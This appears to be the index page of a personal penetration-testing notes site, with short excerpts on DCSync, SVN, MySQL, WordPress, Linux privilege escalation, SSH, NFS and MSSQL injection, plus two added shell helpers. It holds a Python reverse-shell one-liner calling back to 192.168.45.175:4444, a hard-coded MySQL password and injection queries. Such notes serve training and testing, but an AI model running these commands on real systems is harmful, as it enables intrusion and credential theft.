Shuciran Pentesting Notes

DCSync Attack

DCSync Attack Another way to achieve persistence in an Active Directory infrastructure is to steal the password hashes for all administrative users in the domain. To do this, we could move lateral...

Subversion (tcp-3690)

Enumeration commands svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the ch...

MYSQL (tcp-3306)

Connection Common command to connect to MariaDB and MySQL databases (use a bare -p with no value if you want to be prompted for the password instead of leaving it in shell history): mysql -h 10.129.5.43 -u root -p'th1s!smypassw0rd' Note there is no space between -p and the password; with a space, mysql treats the next word as the database name and prompts for the password. MySQL Basic Commands: ...

Wordpress

Default paths: index.php license.txt (copyright notice; the version of WordPress installed is stated in readme.html) wp-activate.php is used for the email activation process when setting up a new WordP...

Automated Enumeration (Linux)

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

For Privilege Access (Linux)

Find a string recursively: # Find ETSCTF in every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...
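The sweeps above as one runnable helper, added here as an example and not taken from the original notes: it builds a throwaway sample tree (constructed data, made-up file names) and runs the string hunt, the recently-modified check, and the two permission checks a privesc pass usually adds next (SUID binaries, world-writable files). It runs offline as an unprivileged user.

```shell
#!/bin/sh
# Added example, not code from the original notes: file-system sweeps for a
# Linux privesc pass, exercised against a constructed sample tree.
# Function and file names are made up for the demo.

# Build a constructed sample tree and print its path.
make_sample_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/home/dev/.config" "$root/opt/app" "$root/tmp"
  printf 'db_pass=ETSCTF{example}\n' > "$root/home/dev/.config/app.conf"
  chmod 0644 "$root/home/dev/.config/app.conf"
  printf 'nothing here\n' > "$root/home/dev/notes.txt"
  chmod 0644 "$root/home/dev/notes.txt"
  touch -t 202001010000 "$root/home/dev/notes.txt"   # old mtime: must not show as recent
  printf '#!/bin/sh\necho hello\n' > "$root/opt/app/run.sh"
  chmod 4755 "$root/opt/app/run.sh"                  # SUID bit set
  : > "$root/tmp/scratch"
  chmod 0777 "$root/tmp/scratch"                     # world-writable
  echo "$root"
}

# Regular files under $1 containing the literal string $2 (grep -l: names only).
find_string() {
  find "$1" -type f -exec grep -l -- "$2" {} \; 2>/dev/null
}

# Regular files under $1 modified in the last $2 minutes (-mmin: GNU and BSD find).
recently_modified() {
  find "$1" -type f -mmin "-$2" 2>/dev/null
}

# SUID binaries: -perm -4000 means "setuid bit set, other bits don't matter".
suid_files() {
  find "$1" -type f -perm -4000 2>/dev/null
}

# World-writable regular files (candidates for planting or tampering).
world_writable() {
  find "$1" -type f -perm -0002 2>/dev/null
}

demo() {
  root=$(make_sample_tree)
  echo "== files containing ETSCTF";  find_string "$root" ETSCTF
  echo "== modified in last 10 min";   recently_modified "$root" 10
  echo "== SUID";                      suid_files "$root"
  echo "== world-writable";            world_writable "$root"
  rm -rf "$root"
}

# Run the demo only when invoked as: sh privesc_sweep.sh demo
if [ "${1:-}" = demo ]; then demo; fi
```

On a real target, point the functions at / instead of the sample root and expect the 2>/dev/null to hide a lot of permission-denied noise from /proc and other users' home directories.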

SSH (tcp-22)

Enumeration Cipher algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from the SSH server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args=ssh_hostkey=full Review i...
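Listing the algorithms is only half the job; the finding is which of them are weak. The filter below is an added example, not code from the original notes: it reads ssh2-enum-algos output on stdin and prints the algorithms that match a weak/legacy pattern. The pattern is this example's own policy choice, not something nmap reports, and the sample output is constructed rather than captured from a real host.

```shell
#!/bin/sh
# Added example, not code from the original notes: flag weak algorithms in
# nmap ssh2-enum-algos output. The pattern is an assumed policy (CBC modes,
# RC4, 3DES, MD5/SHA-1 MACs, truncated -96 MACs, DSA host keys, SHA-1 DH
# groups); adjust it to the engagement's standard.
WEAK_SSH_PATTERN='(-cbc$|arcfour|3des|hmac-md5|hmac-sha1|-96$|ssh-dss|group1-sha1|group-exchange-sha1)'

# Constructed sample of ssh2-enum-algos output (not a real host).
SAMPLE_NMAP_OUTPUT='22/tcp open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (2)
|       curve25519-sha256
|       diffie-hellman-group1-sha1
|   encryption_algorithms: (3)
|       aes128-ctr
|       aes256-cbc
|       arcfour
|   mac_algorithms: (2)
|       hmac-sha2-256
|_      hmac-md5'

# Read nmap output on stdin; print one weak algorithm per line, in the order
# seen. Exit status is grep's: 0 when something weak was found, 1 when the
# list is clean, so the function can gate a larger script.
weak_ssh_algos() {
  # 1. drop nmap's "| " / "|_ " margin and the indent
  # 2. drop header lines ("kex_algorithms: (2)", "ssh2-enum-algos:") and blanks
  # 3. keep only names matching the weak pattern
  sed -e 's/^|[ _]*//' \
    | grep -Ev ':|^[[:space:]]*$' \
    | grep -E -- "$WEAK_SSH_PATTERN"
}

# Typical use against a live host:
#   nmap -p22 10.10.1.3 --script ssh2-enum-algos | weak_ssh_algos
# Offline demo on the constructed sample: sh ssh_weak.sh demo
if [ "${1:-}" = demo ]; then
  printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | weak_ssh_algos
fi
```

Because the header lines are dropped, the output does not say whether a hit is a KEX, cipher or MAC; keep the raw nmap output alongside it for the report.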

NFS (tcp-111)

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Reverse Shells

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...

SQL Injection MSSQL

Simple Commands Basic enumeration can be done with the following queries, taken from PayloadAllTheThings: # Version SELECT @@version # DB user SELECT user_name(); SELECT system_u...